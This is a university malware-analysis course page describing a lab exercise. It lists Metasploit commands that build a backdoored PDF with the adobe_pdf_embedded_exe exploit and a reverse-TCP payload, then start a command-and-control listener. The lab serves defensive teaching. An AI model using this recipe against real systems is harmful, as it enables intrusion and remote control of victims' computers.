Course Repository for University of Cincinnati Malware Analysis Class (CS7038)

View on GitHub

Attack Introduction

A good defense frequently demands an understanding of the offense. In this lecture, we begin building our malware analysis lab by constructing two VMs and virtually connecting them together using the VirtualBox Internal Network feature.

One of these is a VM that is based upon the Kali Linux distribution, maintained by the Offensive Security training & consulting firm. We will use the popular penetration tool Metasploit to create an attack that embeds a backdoor into a PDF document that is intended to be delivered to a target. In our example, some research has already been performed to identify the host operating system and application versions of the target.

The other VM is a simulation of the target’s environment: a version of Windows as well as other productivity applications they are known to use.

In the demo, we build the attack, and in doing so we explore some of the features that Metasploit has to offer as an encyclopedia of exploits. We also demostrate building a simulated attack surface in which to execute the malware.

Slides: lecture-w02-1.pdf (PDF)

Video: CS7038: Wk02.1 - VirtualBox Lab Setup and Attack Simulation Demo (YouTube)

Here is the link for building the PDF exploit used in class

Commands I used:

# Do a search for exploits containing text "adobe_pdf"
msf > search type:exploit platform:windows adobe_pdf

# Select a specific exploit we want to build an attack from
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

# Show the module information for the selected exploit
msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > info

# Select a payload to deliver with the exploit
msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

# Show the exploit's + payload's options
msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options

# Set *this* system as the command-and-control (c2) controller
msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST

# Generate the exploit
msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

Here is the link for creating the C2 listener in Kali

Commands I used to start up the listener:

# Select the exploit handler
msf > use exploit/multi/handler

# Select a specific type of listener we want to connect to us
msf > exploit(handler) > set payload windows/shell/reverse_tcp
# Show the options available to configure in the module
msf > exploit(handler) > show options

# Make sure that we set the listener to the same IP we configured earlier in the payload
msf > exploit(handler) > set LHOST
# Using the same language to build the PDF, we say "exploit" to start listening
msf > exploit(handler) > exploit